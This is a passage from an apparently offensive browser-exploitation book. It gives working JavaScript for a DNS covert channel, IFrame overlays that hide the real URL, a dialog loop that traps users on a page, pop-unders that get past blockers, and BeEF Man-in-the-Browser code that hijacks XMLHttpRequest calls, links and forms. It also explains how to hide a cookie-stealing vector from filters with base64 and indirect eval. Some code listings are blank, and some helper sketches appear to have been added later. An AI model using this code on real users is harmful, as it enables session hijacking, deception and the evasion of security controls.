    char <<= 1;
    char += bits[msg][bit] ;
  }
  // Message is terminated with a null byte (all failed DNS requests)
  if (char != 0) {
    // The message isn't terminated so get the next byte
    messages[msg] += String.fromCharCode(char);
    get_byte(msg, byte+1);
  } else {
    // The message is terminated so finish
    delta = ((new Date()).getTime() - timing[msg])/1000;
    bits_per_second = "" +
      ((messages[msg].length + 1) * 8)/delta;
    console.log(messages[msg] + " - (" +
      (bits_per_second.substr(0,5)) +
      " bits/second)");
  }
}




The bits are stored in the bits array, indexed by the bit number corresponding to the request. This is a convenient way to store bits, because when the array is iterated in the reconstruct_byte() function, you can use it to trivially build the data. For the sake of the example, the relevant subdomains of the tunnel domain are statically mapped to a Google IP address. Figure 3-9 shows the results of running the previous code in Chrome:

Figure 3-9: The server sent the “Browser” string through the DNS tunnel
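The server side of the tunnel is not shown in this section, but its core decision is simple: given a queried subdomain, should the name resolve (a 1 bit) or not (a 0 bit)? The following sketch shows that decision for the bit-XXXXXXXX-XXXXXXXX naming scheme used by the client code. The shouldResolve name and the messages array are hypothetical, and a real DNS server would wrap this logic in its query handler.

```javascript
// Returns true when the queried subdomain should resolve (bit = 1).
// messages is an array of strings indexed by message number.
function shouldResolve(subdomain, messages) {
  var m = /^bit-([0-9a-f]{8})-([0-9a-f]{8})$/i.exec(subdomain);
  if (!m) return false; // not a tunnel query
  var text = messages[parseInt(m[1], 16)] || "";
  var bitIndex = parseInt(m[2], 16);
  var byteIndex = Math.floor(bitIndex / 8);
  // Past the end of the message every bit is 0: the null terminator
  if (byteIndex >= text.length) return false;
  var code = text.charCodeAt(byteIndex) & 0xff;
  // The first bit of each byte is the most significant one,
  // matching the left shifts in the client's reconstruct_byte()
  return ((code >> (7 - (bitIndex % 8))) & 1) === 1;
}
```

Answering with an error for every bit beyond the message length produces the all-zero byte that the client treats as the end of the message.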


You can find a full working example of a bidirectional DNS-based channel on the book’s website. While using DNS requests as a communication channel does provide you with a degree of stealth, particularly in the face of web proxies that may be inspecting web requests, it won’t always be the most efficient channel of communication. In most circumstances, sending cross-origin XMLHttpRequests or WebSocket requests is likely to be a more efficient method of communication.

Exploring Persistence Techniques

Establishing a method to communicate from a hooked browser back to your server is one thing, but persisting that communication channel over time is a little bit more complex. Keeping the connection going, even if the target navigates to a different site or they lose their Internet connectivity, requires a bit of ingenuity, and an understanding of the possible options available to you.

In the following sections, you will investigate methods to persist a communication channel that leverage IFrames, window event handling functions, dynamic pop-unders, and even extensive Man-in-the-Browser techniques. Using any one, or even a combination, of these approaches will help you with maintaining your control over your hooked browsers.

Using IFrames

The <iframe> tag is widely used as a quick way to embed another document into the current HTML page. Many advertising engines rely on the use of this tag to display marketing widgets embedded into websites.

Similar to other HTML tags and features, the <iframe> tag can also be used to mount attacks. IFrames are discussed extensively throughout the book, including the section on Detecting Cross-site Scripting Vulnerabilities in Chapter 9 that discusses the use of XssRays to discover XSS flaws. IFrames are also used in the Exploiting UI Redressing Attacks section of Chapter 4, related to Clickjacking and Cursorjacking attacks.

When you are trying to achieve persistence, IFrames can be extremely effective for a couple of reasons. First, you have complete control over the IFrame’s DOM content, meaning that its CSS can also be controlled. Second, the fact that IFrames are primarily used to embed another document into the current page offers a direct method to persist your communication channel.

Using Full Browser Frame Overlay

Thanks to the control you have over the IFrame’s DOM, including HTML, CSS, and JavaScript, an IFrame can be used to load the current page into an overlay, keeping the communication channel alive in the background. An overlay in this context means a page component, such as an IFrame that is visible in the foreground of the page, while code and other elements are invisible in the background, continuing to execute their logic. On top of this, the HTML5 History API also comes in handy here, especially when masking the real URL in the address bar.

Imagine a web application with a Reflected XSS vulnerability before the user authenticates. You have already hooked the target, but the XSS is not persistent, so to prevent losing connectivity with the target’s browser you create an overlay IFrame. It doesn’t have borders, stretches the width and height to 100 percent and has the source attribute pointing to the web application login page.

A fraction of a second after the IFrame is rendered, the hooked browser will show the content of the login page, while keeping the previous URI in the address bar. Any activity the target performs on the page will happen inside the overlay IFrame, effectively trapping the target in a new frame. At the same time, in the background, the communication channel still works and you can send further commands and continue activities with the target’s browser.

The target is unlikely to spot the attack. The only noticeable events are the reload of the page when the IFrame is rendered, and the address bar containing a different URI from what the target may expect.

An example of how to create an overlay IFrame using jQuery is shown in the following code snippet:

    createIframe: function(type, params, styles, onload) {
        var css = {};
        // Hidden IFrame: 1x1 pixel, no border, not displayed
        if (type == 'hidden') {
            css = $j.extend(true, {
                'border':'none', 'width':'1px', 'height':'1px',
                'display':'none', 'visibility':'hidden'},
                styles);
        }
        // Overlay IFrame: covers the whole browser window
        if (type == 'fullscreen') {
            css = $j.extend(true, {
                'border':'none', 'background-color':'white', 'width':'100%',
                'height':'100%',
                'position':'absolute', 'top':'0px', 'left':'0px'},
                styles);
            $j('body').css({'padding':'0px', 'margin':'0px'});
        }
        var iframe = $j('<iframe />').attr(params).css(
            css).load(onload).prependTo('body');
        return iframe;
    }

The function can create both overlay (if type == 'fullscreen') and hidden IFrames. In the code, the only differences between the two types are the CSS properties applied. For hidden IFrames the smallest IFrame size (1 pixel) is used, with no borders, and the element is then hidden using both the visibility and display properties. For overlay IFrames, the dimensions of the element are maximized instead, removing any additional space from the top and left window regions. Hidden IFrames are particularly useful when launching exploits, and are covered in the following chapters.

To embed a document through the overlay IFrame, you need to specify custom CSS properties to remove borders and to position and size the new element correctly in the browser window. The correct dimensions are 100 percent width and height, with 0 pixel margins and padding. Combined with absolute positioning, these make the IFrame match the current browser window borders exactly.

In the previous example persistence is achieved by using jQuery to extend the already existing CSS styles. The overlay IFrame is created by calling the createIframe function, as in the following code. In this example, the same-origin login.jsp page is loaded, without any additional CSS rules or callbacks.

createIframe('fullscreen',{'src':'/login.jsp'}, {}, null);
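To see how the styles argument interacts with the defaults of each IFrame type, the merge can be sketched without jQuery. This is only an illustration: the names IFRAME_DEFAULTS and iframeStyles are hypothetical, and Object.assign performs a shallow merge, which is enough for flat CSS maps like these.

```javascript
// Illustrative defaults mirroring the two IFrame types described above.
const IFRAME_DEFAULTS = {
  hidden: {
    border: "none", width: "1px", height: "1px",
    display: "none", visibility: "hidden"
  },
  fullscreen: {
    border: "none", "background-color": "white", width: "100%",
    height: "100%", position: "absolute", top: "0px", left: "0px"
  }
};

// Merge caller-supplied styles over the defaults; unknown types get no defaults.
function iframeStyles(type, styles) {
  return Object.assign({}, IFRAME_DEFAULTS[type] || {}, styles || {});
}

const overlay = iframeStyles("fullscreen", { "z-index": "9999" });
console.log(overlay.width, overlay["z-index"]); // 100% 9999
```

Passing an empty object, as in the call above, leaves the defaults untouched.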

In instances where the initial hooked page is something different, for example /page.jsp, the user might suspect something is wrong after the overlay IFrame is created. The content in the page is from /login.jsp, but the URI still says /page.jsp. To overcome this issue, you can leverage the HTML5 History API [13]:

history.pushState({be:"EF"}, "page x", "/login.jsp");

Executing the previous code will result in the browser changing the URL bar to http://<hooked_domain>/login.jsp. For obvious security reasons, you must pass a same-origin URL to pushState; otherwise you get a security exception. The interesting thing about manipulating the browser history with pushState is that the resource, for instance /login.jsp, is not loaded by the browser and doesn’t even need to exist.
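The same-origin requirement can be checked before calling pushState. The following is a minimal sketch, assuming a hypothetical helper named isSameOrigin and made-up host names; it relies only on the standard URL class.

```javascript
// Returns true when `candidate`, resolved against `current`, stays on the same origin.
function isSameOrigin(current, candidate) {
  try {
    return new URL(candidate, current).origin === new URL(current).origin;
  } catch (err) {
    return false; // unparsable URL
  }
}

// Host names below are examples only.
console.log(isSameOrigin("http://hooked.example/page.jsp", "/login.jsp"));                     // true
console.log(isSameOrigin("http://hooked.example/page.jsp", "http://other.example/login.jsp")); // false
```

In a browser, the first argument would typically be location.href, and pushState would only be called when the check returns true.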

The use of IFrames to persist your control over a target’s browser is just one available technique at your disposal. The benefit of IFrames is that they’re generally well supported by browsers, and the ability to overlay the current content increases the likelihood that your hook will remain undetected. There are some limiting factors to this technique. If the content you want to frame includes frame-busting code, or restrictive X-Frame-Options headers, then you may have to investigate using one of the techniques discussed in the following sections instead.

Using Browser Events

Have you ever seen websites that ask you for confirmation before they close? This behavior can be exceptionally irritating, especially if the site keeps on asking the same question every time you click OK on the dialog box.

This is exactly what you can do to increase the time a target will stay on a specific page that you have control of. In certain circumstances, remaining on the hooked page a couple of seconds longer results in a few more command modules being executed. Remember, the longer you keep the browser hooked, the better.

This technique relies on handling the onbeforeunload event associated with the window object, which is triggered by default under the following conditions:

· When the unload event is fired, that is, when you close the current tab or the whole browser, or simply navigate away

· When window.close or document.close is called

· When location.replace or location.reload is called

Following is a basic implementation that works in all desktop browsers except Opera prior to version 12:

    var LEAVE_MSG = "There is currently a request to the server " +
        "pending. You will lose recent changes by navigating away.";

    function display_confirm(){
        if(confirm("Are you sure you want to navigate away from this " +
            "page?\n\n " + LEAVE_MSG + "\n\n Press OK " +
            "to continue, or Cancel to stay on the current page.")){
            // re-display the dialog for as long as the user clicks OK
            display_confirm();
        }
    }

    function dontleave(e){
        e = e || window.event;
        // if the browser is Internet Explorer, slightly different syntax
        // (assumed feature check: older IE lacks stopPropagation)
        if (!e.stopPropagation) {
            e.cancelBubble = true;
            e.returnValue = LEAVE_MSG;
        } else {
            e.stopPropagation();
            e.preventDefault();
            e.returnValue = LEAVE_MSG;
        }
        //re-display the confirm dialog, annoying the user if he clicks OK
        display_confirm();
        return LEAVE_MSG;
    }

    window.onbeforeunload = dontleave;

This example overrides any existing code that already manages the onbeforeunload event and makes the browser execute the dontleave function instead. As an additional precaution, the handler stops event propagation, using the cancelBubble property in Internet Explorer and the stopPropagation() function in other browsers. This prevents existing functions from interfering with the new code. Depending on the complexity of the existing JavaScript code, disabling event bubbling is also a good idea for performance reasons. If there are many nested elements, simply overriding the existing code while preventing bubbling may be a good choice.

The behavior is slightly different depending on the browser. In Figures 3-10 and 3-11 you can see the behavior in Firefox 18. The second confirm dialog box opens automatically if the victim clicks Cancel. If the victim clicks OK, the dialog box will be re-displayed in a loop. The only possible action to really leave the page is to click Leave Page as shown in Figure 3-11.

Figure 3-10: First dialog on Firefox 18 with custom content (controlled with JavaScript)


Figure 3-11: Second dialog on Firefox 18 (can’t be controlled with JavaScript)


The behavior is very similar in Internet Explorer 9 on Windows 7, but you have slightly more control over the dialog box text, as you can see in Figures 3-12 and 3-13. The text of the second dialog box, in Figure 3-13, can also be customized. The overall behavior remains the same as Firefox, though.

Figure 3-12: First dialog box on IE 9 with custom content (controlled with JavaScript)


Figure 3-13: Second dialog box on IE 9 (controlled with JavaScript)


As a result, you might want to use the OnClose technique only on Internet Explorer browsers, given the limited message customization functionality in Firefox and Chrome.

As a method for maintaining persistence, these events may buy you a few more seconds of execution time, but they’re certainly not ideal for keeping control over a target’s browser. Using a pop-under window, which is discussed in the next section, may offer you a new opportunity to retain some form of control over the hooked browser. Of course, there’s no reason why you can’t combine a number of techniques: by layering these custom close event handling routines with IFrames and pop-under windows, you may succeed in maintaining your hook just long enough to complete that command you were waiting for.

Using Pop-Under Windows

When you browse to a website, there is nothing more annoying than an unprompted pop-up. How many times have you been forced to repeatedly close multiple pop-ups displaying advertisements? Whereas a pop-up is a new browser window that appears in the foreground of the current browser page, a pop-under is a new browser window that appears in the background, literally under the current browser window. Most modern browsers block pop-under behavior by default.

The easiest way to open a pop-under with JavaScript is by using the window.open() method. The following code will be blocked by default in the latest versions of Firefox and Chrome:

    window.open('', 'popunder', 'toolbar=0');





The script is blocked because the browser realizes the new window will open without any user intervention, such as an explicit mouse click.

You might start to wonder how you can bypass this behavior. The first potential solution to examine is using MouseEvents to simulate mouse actions programmatically through JavaScript code. Suppose you have a link you control, either by creating it dynamically or by exploiting an XSS vulnerability within an onClick attribute, similar to the following:

<a id="malicious_link" href=""

onclick=" open_link()">Goo</a>

Now inject the following JavaScript in the same page:

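    function open_link(){
        window.open('', 'popunder', 'toolbar=0');
    }

    function clickLink(link) {
        var cancelled = false;
        if (document.createEvent) {
            // Standards-based browsers: build and dispatch a synthetic click
            var event = document.createEvent("MouseEvents");
            event.initMouseEvent("click", true, true, window,
                0, 0, 0, 0, 0, false, false, false, false, 0, null);
            cancelled = !link.dispatchEvent(event);
        } else if (link.fireEvent) {
            // Older Internet Explorer
            cancelled = !link.fireEvent("onclick");
        }
    }

    clickLink(document.getElementById("malicious_link"));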

The preceding code tells the browser to execute the clickLink() function on the A element with the given ID, which contains the window.open() call inside its onClick attribute. Unfortunately, this experiment will still not work because a MouseEvent created with JavaScript is not the same as a real user click.
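In current engines, one visible marker of this difference is the isTrusted flag on the event object, which is false for events created by script. The following is a minimal sketch, assuming an environment that provides the standard EventTarget and Event constructors (browsers and recent Node.js versions); how each pop-up blocker actually decides is internal to the browser and is not shown here.

```javascript
// A generic event target stands in for the link element.
const link = new EventTarget();
let sawTrusted = null;

// Record whether the click that arrives is marked as user-generated.
link.addEventListener("click", (event) => {
  sawTrusted = event.isTrusted;
});

// Dispatch a click created from script rather than by the user.
link.dispatchEvent(new Event("click"));
console.log(sawTrusted); // false
```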

To bypass this limitation, instead of relying on creating mouse events, you can be craftier and use JavaScript to add or overwrite onClick attributes on existing page links. This technique will be expanded further in the Man-in-the-Browser attacks section.

The following code retrieves all the <a> tags on the page, adding an onClick attribute that when triggered will open the pop-under. The $.popunder() function is a jQuery plugin [14] written by Hans-Peter Buniat that creates cross-browser pop-under windows.

    var anchors = document.getElementsByTagName("a");
    for (var i = 0; i < anchors.length; i++) {
        // the aPopunder object is defined in the next code snippet
        anchors[i].setAttribute("onclick", "$.popunder(aPopunder)");
    }

When the user clicks one of the page links, the URI in the href attribute will be opened, together with the pop-under. The pop-under is not blocked by default in modern browsers. The only browser that is not vulnerable in this instance is Opera.

Expanding on this, if you want to be as stealthy as possible, you can position the pop-under exactly behind the current browser window. You can achieve this by measuring the position of the current browser window using window.screenX and window.screenY. The height and width of the pop-under have to be set to at least 1 pixel because 0 pixels is blocked by most browsers. However, in most circumstances the resulting pop-under will be larger than 1 pixel, as you can see in Figure 3-14. Note that the pop-unders have been manually positioned at the left of the main browser window; otherwise they would have been invisible to the user:

Figure 3-14: Different pop-under dimensions in Firefox and Safari


Using this information, you can modify the $.popunder() function in the following way:

    var aPopunder = [
        ['', {"window": {height:1,
            width:1, left:window.screenX, top:window.screenY}}]
    ];

When the user clicks the link, which has been dynamically modified with the new onClick attribute as shown in the preceding code, a pop-under pointing to the specified URL will be loaded. What you want to achieve with this technique is to load a resource that contains your JavaScript hook. If you combine it with the Man-in-the-Browser or IFrame techniques, you can avoid losing the hook if the victim closes the current hooked tab, achieving longer persistence.
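The same positioning idea can be expressed without the plugin, as a features string for window.open(). This is a rough sketch under stated assumptions: popunderFeatures is a hypothetical helper, and fakeWindow is a stand-in object so the code also runs outside a browser.

```javascript
// Build a window.open() features string that places a 1x1 window
// at the same screen position as the opener.
function popunderFeatures(win) {
  const options = {
    width: 1, height: 1,
    left: win.screenX, top: win.screenY,
    toolbar: 0
  };
  return Object.keys(options)
    .map((key) => key + "=" + options[key])
    .join(",");
}

// Stand-in for the real window object (values are made up).
const fakeWindow = { screenX: 120, screenY: 80 };
console.log(popunderFeatures(fakeWindow)); // width=1,height=1,left=120,top=80,toolbar=0
```

In a browser, the result would be passed as the third argument of window.open() from inside a click handler, with window in place of fakeWindow.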

Using Man-in-the-Browser Attacks

Asynchronous JavaScript and XML, or AJAX, is one of the most popular ways to create highly responsive web applications. Thanks to the explosive growth of AJAX, JavaScript was given a second life. Naturally, attackers have started to use AJAX too.

One of the benefits of using AJAX as an attacker is enhanced Man-in-the-Browser (MitB) techniques. Using these techniques provides a more effective way to achieve persistence, and overcomes a number of the traditional IFrame overlay security controls from earlier because it also works in the presence of X-Frame-Options headers or other Framebusting logic.

A MitB attack, as discussed briefly in Chapter 2, allows you to watch what the user is doing, for instance clicking a link within the same-origin, or submitting a form. MitB code is able to intercept and extend the DOM event-handling functionality, and if it chooses, perform the user-initiated action dynamically. At this point the correct resources are retrieved and results are returned back to the user, while still maintaining persistence to your attacker-controlled server.

The difference between normal page behavior and a MitB poisoned page resides in the fact that MitB loads resources asynchronously while keeping the hook alive. For example, if a target were hooked through a Reflected XSS, a simple click on a link to the same origin would result in losing the hook. This happens because the page is reloaded and the script, which was injected through the XSS, is no longer present in the DOM of the page. Although this issue can be addressed using the IFrame techniques previously described, as you have seen this might not work in certain cases. The MitB technique on the other hand is likely to work in more situations where IFrames can’t be used.

Man-in-the-Browser vs. Man-in-the-Middle Attacks

Whereas a Man-in-the-Middle (MitM) attack generally refers to eavesdropping attacks at the network level, Man-in-the-Browser refers to eavesdropping attacks at the application level or, even better, at the browser level. A similarity with MitM is the relaying of data that was intended for the legitimate server back to the attacker. MitB techniques are used extensively by banking malware like SpyEye and Zeus [15] in order to subvert the content rendered by the browser when users visit their banking websites.

Page content is altered in various ways depending on the malware configuration. The final result is often a modified look and feel of the page’s HTML in order to display fake content. For instance, the login page of a banking website may be altered claiming that the bank introduced new “security” features. The user might be asked to provide more details such as date of birth, mother’s maiden name, or even second factor authentication data (for example, RSA one-time PINs).

What makes these attacks hard to spot is the fact that they are completely client side, and are often not seen by the web server. This often limits the effectiveness of server-side mitigations or Web Application Firewalls.

These attacks can be performed in a few different ways. One technique relies on intercepting the traffic of the infected machine when visiting the target bank site, and modifying it when it returns with new HTML content, prior to the browser rendering it. Another technique is injecting custom JavaScript that overrides the page behavior dynamically, poisoning existing web application logic and adding new content.

Hijacking AJAX Calls

MitB attacks aim to hijack AJAX GET and POST requests, and they work in both same- and cross-origin scenarios. These attacks are possible thanks to the flexibility of JavaScript and the DOM. One of the great features of JavaScript is the ability to override the prototypes of built-in DOM methods.

Prototype overriding is one of the tricks used by a MitB attack to hijack AJAX requests. The following snippet from BeEF shows how the “open” method of the XMLHttpRequest object prototype is overridden with custom logic. You won’t be able to just copy this code verbatim though, as it does depend on some of BeEF’s other features too.

    init:function (cid, curl) {
        beef.mitb.cid = cid;
        beef.mitb.curl = curl;
        /*Override open method to intercept ajax request*/
        var xml_type;
        var hook_file = "<%= @hook_file %>";
        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
            beef.mitb.sniff("Method override");
            (function (open) {
                XMLHttpRequest.prototype.open = function (method, url,
                    async, mitb_call) {
                    // Ignore it and don't hijack it.
                    // It's a request part of the hook polling process
                    if (mitb_call || (url.indexOf(hook_file) != -1 ||
                        url.indexOf("/dh?") != -1)) {
                        open.call(this, method, url, async, true);
                    } else {
                        var portRegex = new RegExp(":[0-9]+");
                        var portR = portRegex.exec(url);
                        var requestPort;
                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
                        //GET request
                        if (method == "GET") {
                            //GET request -> cross-origin
                            if (url.indexOf(document.location.hostname) == -1 ||
                                (portR != null && requestPort != document.location.port)){
                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                window.open(url);
                            } else {
                                //GET request -> same-domain
                                beef.mitb.sniff("GET [Ajax Request]: " + url);
                                if (beef.mitb.fetch(url,
                                    document.getElementsByTagName("html")[0])) {
                                    var title = "";
                                    if(document.getElementsByTagName("title").length == 0){
                                        title = document.title;
                                    } else {
                                        title = document.getElementsByTagName(
                                            "title")[0].innerHTML;
                                    }
                                    // write the url of the page
                                    history.pushState({ Be:"EF" }, title, url);
                                }
                            }
                        } else {
                            //POST request
                            beef.mitb.sniff("POST ajax request to: " + url);
                            open.call(this, method, url, async, true);
                        }
                    }
                };
            })(XMLHttpRequest.prototype.open);
        }
    }

After the init function is called, every time XMLHttpRequest.open is used, its behavior will change according to this custom overridden implementation:

1. Check if the MitB itself initiated the request, or if it is part of the hook communication channel. In either case, do not hijack it.

2. If the request method is GET, determine if the request is same-origin or cross-origin.

3. If same-origin, load the resource and display its content on the current page, keeping the hook alive. Replace the page title with the original one, and replace the URL bar content with the proper resource URI using the history object (history.pushState).

4. If cross-origin, simply open the resource in a new tab (window.open) to keep the hook alive in the current tab.

5. If the method is POST, just do the request.
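The steps above can be sketched in a form that runs without BeEF or a browser. Everything here is an assumption made for illustration: hijackOpen, the option callbacks, the FakeXhr stand-in class, and the example URLs are hypothetical and only mirror the decision logic, not the framework's actual implementation.

```javascript
// Wrap `open` on any XMLHttpRequest-like class. All names are illustrative.
function hijackOpen(XhrClass, options) {
  const originalOpen = XhrClass.prototype.open;
  XhrClass.prototype.open = function (method, url, async, internal) {
    // Steps 1 and 5: hook traffic, the wrapper's own requests, and POSTs pass through.
    if (internal || options.isHookUrl(url) || method !== "GET") {
      return originalOpen.call(this, method, url, async);
    }
    // Steps 2 to 4: route GET requests by origin.
    if (options.isSameOrigin(url)) {
      options.onSameOrigin(url);
    } else {
      options.onCrossOrigin(url);
    }
  };
  // Allow the override to be undone.
  return function restore() { XhrClass.prototype.open = originalOpen; };
}

// Stand-in class so the sketch runs without a browser.
class FakeXhr {
  open(method, url) { FakeXhr.opened.push(method + " " + url); }
}
FakeXhr.opened = [];

const log = [];
hijackOpen(FakeXhr, {
  isHookUrl: (url) => url.indexOf("/hook.js") !== -1,
  isSameOrigin: (url) => url.startsWith("/"),
  onSameOrigin: (url) => log.push("same:" + url),
  onCrossOrigin: (url) => log.push("cross:" + url)
});

const xhr = new FakeXhr();
xhr.open("GET", "/hook.js", true);               // passes through (hook traffic)
xhr.open("GET", "/account", true);               // routed as same-origin
xhr.open("GET", "http://other.example/", true);  // routed as cross-origin
xhr.open("POST", "/transfer", true);             // passes through (POST)
console.log(FakeXhr.opened.join(", ")); // GET /hook.js, POST /transfer
console.log(log.join(", "));            // same:/account, cross:http://other.example/
```

Passing the original function into a wrapper and calling it with call(this, ...) is the same pattern the closure in the BeEF snippet uses to keep the native behavior reachable.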

Hijacking Non-AJAX Requests

Non-AJAX GET and POST requests can be hijacked as well. Similar to AJAX resources, normal resources are prefetched by the MitB code, subverting default behavior (AKA poisoning) of links and forms.

For instance, if the page contains an <a> tag pointing to a same-origin resource, the MitB adds an onClick event attribute that will execute a JavaScript function. When the user clicks the link, the default behavior (GET request to a page) is prevented, and instead the new onClick event handler will manage the click event. In case the link already contains an onClick attribute, MitB replaces that method, calling a different function. The following code from BeEF is an example:

    // Fetches a hooked link with AJAX
    fetch:function (url, target) {
        try {
            var y = new XMLHttpRequest();
            // synchronous request; the fourth argument marks it as a MitB call
            y.open('GET', url, false, true);
            y.onreadystatechange = function () {
                if (y.readyState == 4 && y.responseText != "") {
                    target.innerHTML = y.responseText;
                }
            };
            y.send(null);
            beef.mitb.sniff("GET: " + url);
            return true;
        } catch (x) {
            // the request failed (for example cross-origin): open a new window
            window.open(url);
            beef.mitb.sniff("GET [New Window]: " + url);
            return false;
        }
    },

    // Hooks anchors and prevents them from linking away
    poisonAnchor:function (e) {
        try {
            e.preventDefault();
            if (beef.mitb.fetch(e.currentTarget,
                document.getElementsByTagName("html")[0])) {
                var title = "";
                if(document.getElementsByTagName("title").length == 0){
                    title = document.title;
                } else {
                    title = document.getElementsByTagName(
                        "title")[0].innerHTML;
                }
                history.pushState({ Be:"EF" }, title, e.currentTarget);
            }
        } catch (e) {
            console.error('beef.mitb.poisonAnchor - failed to execute: '+
                e.message);
        }
        return false;
    }

    var anchors = document.getElementsByTagName("a");
    var lis = document.getElementsByTagName("li");
    for (var i = 0; i < anchors.length; i++) {
        anchors[i].onclick = beef.mitb.poisonAnchor;
    }
    for (var i = 0; i < lis.length; i++) {
        if (lis[i].hasAttribute("onclick")) {
            lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" +
                lis[i].getElementsByTagName("a")[0] + "')");
        }
    }

The fetchOnclick function is similar to the fetch function, and has been omitted here. The full source code is available online.

Poisoning forms is similar to poisoning links. The only difference is that it requires a bit more logic because the form fields need to be parsed while the onSubmit event is triggered. The result is the same, so the POST request is sent using AJAX, and the target innerHTML is then updated with the proper content, while in the background the hook is still working. The target is unlikely to spot the attack because there are no changes to the look and feel of the page. The only potential indicator of the attack is opening cross-origin links in new tabs, instead of the current window.
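The extra parsing step for forms amounts to turning the field names and values into a request body. The following is a minimal sketch, assuming the fields have already been collected into a list of name/value pairs (for example from form.elements); encodeFormFields is a hypothetical helper, and its output only approximates the browser's own application/x-www-form-urlencoded serialization.

```javascript
// Serialise form fields into a URL-encoded body.
// `fields` is a list of {name, value} pairs.
function encodeFormFields(fields) {
  return fields
    .filter((field) => field.name) // unnamed controls are not submitted
    .map((field) =>
      encodeURIComponent(field.name) + "=" + encodeURIComponent(field.value))
    .join("&")
    .replace(/%20/g, "+");         // form encoding uses + for spaces
}

console.log(encodeFormFields([
  { name: "user", value: "alice" },
  { name: "note", value: "a&b c" }
])); // user=alice&note=a%26b+c
```

The resulting string would be sent as the body of the AJAX POST, with the Content-Type header set to application/x-www-form-urlencoded.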

From Monitoring to Expanding the Attack Surface

It must be noted that user activity, for example which links are clicked and which forms (including data) are submitted, can be logged and made available to you. This is useful in situations where the user is clicking on cross-origin links. In this particular case, thanks to the Same Origin Policy, loading the resource via AJAX obviously won’t be successful. If this happens, the link is simply opened in a new tab, preventing the loss of the hook because the already hooked tab remains open. You can’t control the newly opened tab, because it’s a different origin. However, you can determine what its URL is, because you have full control of the page DOM.

At this point you can attempt to expand the attack surface by running XssRays on the target resource to look for XSS vulnerabilities. If further flaws are discovered, they can be used to hook the new origin by exploiting the XSS, resulting in the control of the origin loaded in the second tab too. This attack technique with XssRays is covered in Chapter 9.

As with all of the techniques available for maintaining a persistent communication channel, there will always be varying degrees of success. One of the potential issues with using MitB logic is handling complex JavaScript-based applications. For instance, when an already existing onClick attribute is poisoned through the MitB functionality, some previous code might get overridden, because the legitimate function is simply replaced. A way to overcome this limitation is to use addEventListener, or attachEvent in the case of Internet Explorer, to dynamically call a new function when the same event is triggered [16]. Such an approach allows for stacking event handlers, so the newly injected ones are called after the existing ones have executed. The same problem occurs when appending the response of a poisoned AJAX request to the right page fragment. MitB techniques work well in many situations, but be aware that you may need to customize the default behavior for targeted attacks in complex JavaScript-based web applications.
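The stacking behavior of addEventListener can be seen in a few lines. This is a small sketch, assuming an environment with the standard EventTarget and Event constructors; a generic target is used in place of a real page element, and the handler labels are made up.

```javascript
const target = new EventTarget();
const calls = [];

// The application's own handler, registered first.
target.addEventListener("click", () => calls.push("legitimate"));

// The injected handler is added alongside it rather than replacing it.
target.addEventListener("click", () => calls.push("injected"));

target.dispatchEvent(new Event("click"));
console.log(calls.join(" -> ")); // legitimate -> injected
```

Assigning to an onclick property, by contrast, keeps only the last function assigned, which is how the legitimate handler gets lost.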

Evading Detection

Evading detection from Web Application Firewalls, inspecting web proxies or client-side heuristic Anti-Virus technology is a cat-and-mouse game. Security researchers often find new evasion techniques that work for a period of time. When the techniques become public knowledge, defenders start to implement detection techniques, and the current evasion technique becomes less effective. Translating this into pseudo-code may look like this:




    while true
        researchers find a new evasion technique
        sleep 10
        defenders implement detection for it
        sleep 20
    end



Don’t forget that the time it takes for a detection mechanism to be implemented universally may be considerable; the evasion technique will still continue to work in all those environments where the detection is not yet in place. Chaining evasion techniques together can also assist with trying to avoid detection. This will not evade the best human mind if manual analysis is in place, but it will be very effective with proxies and other security devices that inspect the content of HTTP or other protocols.

Imagine a Russian nesting doll (matryoshka), where each layer is a different evasion technique, and the real JavaScript code is then nested inside. Bear in mind that obfuscating JavaScript will not prevent the browser from understanding your code.

Various techniques to help reduce the likelihood that your JavaScript code is detected are presented in the following sections. Each discussed technique has been implemented as an extension within the BeEF framework.

Bear in mind that encoding and obfuscation should not be used to achieve confidentiality of your data. With enough time, every obfuscation technique can be defeated.

Evasion using Encoding

The first and easiest way to hide the code you want to execute is by encoding it. In this context, encoding and decoding is the process of transforming code from one format into another. Many different encodings and techniques are available within a browser. Some of them are as simple as using base64 to encode a plaintext string. Others are more advanced and rely on particular aspects of the JavaScript language, such as non-alphanumeric codes.

Base64 Encoding

A common detection technique used to evaluate potentially malicious JavaScript is to implement Regex-based filters that search for eval, document.cookie, or other keywords that can potentially be used for malicious purposes. If you wanted to steal a web application’s cookies that are not marked as HttpOnly, you would execute:


This code will send the cookies to your site. Unfortunately, the original site’s filter may detect the document.cookie reference and filter it out. To hide the document.cookie code you can base64-encode it, and the attack vector becomes:



The Regex-based filter unfortunately still blocks the vector because the blacklisted eval keyword is still present. There are multiple different ways to get access to the window object, which can help achieve eval behavior by using different statements. For example:


Another method is to use either the setTimeout() or setInterval() functions (or even setImmediate() in newer browsers), all of which evaluate JavaScript functions. Note that for setTimeout(), the second argument, which specifies a millisecond delay before calling the function, is not mandatory. If not specified, the function is called immediately. Using setTimeout(), the final code will be:



This code snippet bypasses the Regex-based filter mentioned earlier and demonstrates a method in which multiple evasion techniques can be chained together.

Base64 is not the only way to encode data. Plenty of other methods are available too, for example URL encoding, double URL encoding, Hex encoding, Unicode escapes, and so on.
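The chaining of base64 decoding with an indirect evaluation route can be illustrated with a harmless payload. This is a sketch under stated assumptions: the filter regex, the payload, and the variable names are hypothetical, and the payload only returns a string that happens to contain a filtered keyword.

```javascript
// atob/btoa exist in browsers and recent Node.js; fall back to Buffer otherwise.
const decode = typeof atob === "function"
  ? atob
  : (s) => Buffer.from(s, "base64").toString("binary");
const encode = typeof btoa === "function"
  ? btoa
  : (s) => Buffer.from(s, "binary").toString("base64");

// Hypothetical keyword filter of the kind described above.
const filter = /\beval\b|document\.cookie/;

// Harmless stand-in payload: it only returns a string naming the keyword.
const payload = "return 'document.cookie'";
const encoded = encode(payload);

// The vector as it would appear in the page source.
const vector = '[].constructor.constructor(atob("' + encoded + '"))()';

console.log(filter.test(payload)); // true: the plain payload is caught
console.log(filter.test(vector));  // false: neither keyword appears in the vector

// [].constructor.constructor is the Function constructor, reached without naming it.
console.log([].constructor.constructor(decode(encoded))()); // document.cookie
```

In a browser, passing the decoded string to setTimeout() is another route to evaluation; some non-browser runtimes reject string arguments there, so the sketch uses the Function constructor instead.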

Packing JavaScript

